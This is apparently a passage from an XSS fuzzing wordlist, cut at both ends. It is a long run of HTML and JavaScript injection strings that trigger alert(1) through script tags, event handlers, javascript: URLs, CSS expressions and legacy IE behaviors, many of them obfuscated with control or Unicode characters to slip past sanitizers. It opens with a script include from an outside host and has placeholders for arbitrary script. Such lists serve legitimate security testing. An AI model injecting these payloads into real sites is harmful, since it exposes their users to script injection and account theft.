src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script>     '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> "><img src=x onerror=javascript:alert(1)> "><img src=x onerror=javascript:alert('1')> "><img src=x onerror=javascript:alert("1")> "><img src=x onerror=javascript:alert(`1`)> "><img src=x onerror=javascript:alert(('1'))> "><img src=x onerror=javascript:alert(("1"))> "><img src=x onerror=javascript:alert((`1`))> "><img src=x onerror=javascript:alert(A)> "><img src=x onerror=javascript:alert((A))> "><img src=x onerror=javascript:alert(('A'))> "><img src=x onerror=javascript:alert('A')> "><img src=x onerror=javascript:alert(("A"))> "><img src=x onerror=javascript:alert("A")> "><img src=x onerror=javascript:alert((`A`))> "><img src=x onerror=javascript:alert(`A`)> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=javascript:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style> <x style="background:url('x;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">ºscriptÊjavascript:alert(1)º/scriptÊ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> <IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> <TABLE BACKGROUND="javascript:javascript:alert(1)"> <TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> <DIV STYLE="background-image: url(javascript:javascript:alert(1))"> <DIV STYLE="width:expression(javascript:alert(1));"> <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> <XSS STYLE="xss:expression(javascript:alert(1))"> <STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> <STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> <!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> <BASE 